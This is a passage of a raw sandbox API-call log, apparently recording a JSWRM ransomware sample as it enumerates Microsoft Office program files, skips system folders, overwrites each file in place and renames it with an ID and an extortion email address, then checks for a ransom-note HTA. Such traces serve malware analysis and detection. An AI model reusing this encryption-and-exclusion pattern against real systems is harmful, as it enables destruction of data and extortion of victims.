hTemplateFile=0x0) returned 0x45c [0129.703] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1580) returned 1 [0129.703] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.703] ReadFile (in: hFile=0x45c, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345ec04*=0x620, lpOverlapped=0x0) returned 1 [0129.705] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.705] WriteFile (in: hFile=0x45c, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345ec00*=0x620, lpOverlapped=0x0) returned 1 [0129.705] CloseHandle (hObject=0x45c) returned 1 [0129.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excelcnv.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excelcnv.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\excelcnv.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excelcnv.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.706] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x16440, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="excelcnvpxy.dll", cAlternateFileName="EXCELC~1.DLL")) returned 1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2=".") returned 1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="..") returned 1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="...") returned 1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="windows") returned -1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="recovery") returned -1 [0129.706] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="perflogs") returned -1 [0129.707] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="documents and settings") returned 1 [0129.707] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.707] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="system volume information") returned -1 [0129.707] lstrcmpiW (lpString1="excelcnvpxy.dll", lpString2="msocache") returned -1 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnvpxy.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnvpxy.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnvpxy.dll", lpUsedDefaultChar=0x0) returned 15 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnvpxy.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelcnvpxy.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelcnvpxy.dll", lpUsedDefaultChar=0x0) returned 15 [0129.707] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d4481d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67030, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="EXSEC32.DLL", cAlternateFileName="")) returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2=".") returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="..") returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="...") returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="windows") returned -1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="recovery") returned -1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="perflogs") returned -1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="documents and settings") returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="system volume information") returned -1 [0129.707] lstrcmpiW (lpString1="EXSEC32.DLL", lpString2="msocache") returned -1 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXSEC32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXSEC32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXSEC32.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXSEC32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXSEC32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXSEC32.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.707] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17d1e5ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1469b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExtensibleApp.xap", cAlternateFileName="EXTENS~1.XAP")) returned 1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2=".") returned 1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="..") returned 1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="...") returned 1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="windows") returned -1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="recovery") returned -1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="perflogs") returned -1 [0129.707] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="documents and settings") returned 1 [0129.708] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="$RECYCLE.BIN") returned 1 [0129.708] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="system volume information") returned -1 [0129.708] lstrcmpiW (lpString1="ExtensibleApp.xap", lpString2="msocache") returned -1 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtensibleApp.xap", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtensibleApp.xap", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExtensibleApp.xap", lpUsedDefaultChar=0x0) returned 17 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtensibleApp.xap", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExtensibleApp.xap", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExtensibleApp.xap", lpUsedDefaultChar=0x0) returned 17 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ExtensibleApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\extensibleapp.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.709] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=83611) returned 1 [0129.709] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.709] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14690, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x14690, lpOverlapped=0x0) returned 1 [0129.715] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.715] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14690, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x14690, lpOverlapped=0x0) returned 1 [0129.717] CloseHandle (hObject=0x45c) returned 1 [0129.717] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ExtensibleApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\extensibleapp.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ExtensibleApp.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\extensibleapp.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.718] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x16da48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="FACILITY.DLL", cAlternateFileName="")) returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2=".") returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="..") returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="...") returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="windows") returned -1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="recovery") returned -1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="perflogs") returned -1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="documents and settings") returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="system volume information") returned -1 [0129.718] lstrcmpiW (lpString1="FACILITY.DLL", lpString2="msocache") returned -1 [0129.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FACILITY.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FACILITY.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.718] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ccc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="FilterModule.dll", cAlternateFileName="FILTER~1.DLL")) returned 1 [0129.719] lstrcmpiW (lpString1="FilterModule.dll", lpString2=".") returned 1 [0129.719] lstrcmpiW (lpString1="FilterModule.dll", lpString2="..") returned 1 [0129.719] lstrcmpiW (lpString1="FilterModule.dll", lpString2="...") returned 1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="windows") returned -1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="recovery") returned -1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="perflogs") returned -1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="documents and settings") returned 1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="$RECYCLE.BIN") returned 1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="system volume information") returned -1 [0129.720] lstrcmpiW (lpString1="FilterModule.dll", lpString2="msocache") returned -1 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FilterModule.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FilterModule.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FilterModule.dll", lpUsedDefaultChar=0x0) returned 16 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FilterModule.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FilterModule.dll", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FilterModule.dll", lpUsedDefaultChar=0x0) returned 16 [0129.720] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2497e17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2497e17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2687c83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc5640, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="FIRSTRUN.EXE", cAlternateFileName="")) returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2=".") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="..") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="...") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="windows") returned -1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="recovery") returned -1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="perflogs") returned -1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="documents and settings") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="$RECYCLE.BIN") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="system volume information") returned -1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.EXE", lpString2="msocache") returned -1 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FIRSTRUN.EXE", lpUsedDefaultChar=0x0) returned 12 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FIRSTRUN.EXE", lpUsedDefaultChar=0x0) returned 12 [0129.720] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x190c9cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="FIRSTRUN.VisualElementsManifest.xml", cAlternateFileName="FIRSTR~1.XML")) returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2=".") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="..") returned 1 [0129.720] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="...") returned 1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="windows") returned -1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0129.721] lstrcmpiW (lpString1="FIRSTRUN.VisualElementsManifest.xml", lpString2="msocache") returned -1 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22d298, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FIRSTRUN.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FIRSTRUN.VisualElementsManifest.xml", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FIRSTRUN.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 35 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FIRSTRUN.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\firstrun.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.722] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=344) returned 1 [0129.722] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.722] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0129.723] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.723] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0129.723] CloseHandle (hObject=0x45c) returned 1 [0129.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FIRSTRUN.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\firstrun.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FIRSTRUN.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\firstrun.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.724] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca90ec5a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="FORMS", cAlternateFileName="")) returned 1 [0129.724] lstrcmpiW (lpString1="FORMS", lpString2=".") returned 1 [0129.724] lstrcmpiW (lpString1="FORMS", lpString2="..") returned 1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="...") returned 1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="windows") returned -1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="recovery") returned -1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="perflogs") returned -1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="documents and settings") returned 1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="$RECYCLE.BIN") returned 1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="system volume information") returned -1 [0129.725] lstrcmpiW (lpString1="FORMS", lpString2="msocache") returned -1 [0129.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\jswrm-decrypt.hta")) returned 0xffffffff [0129.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 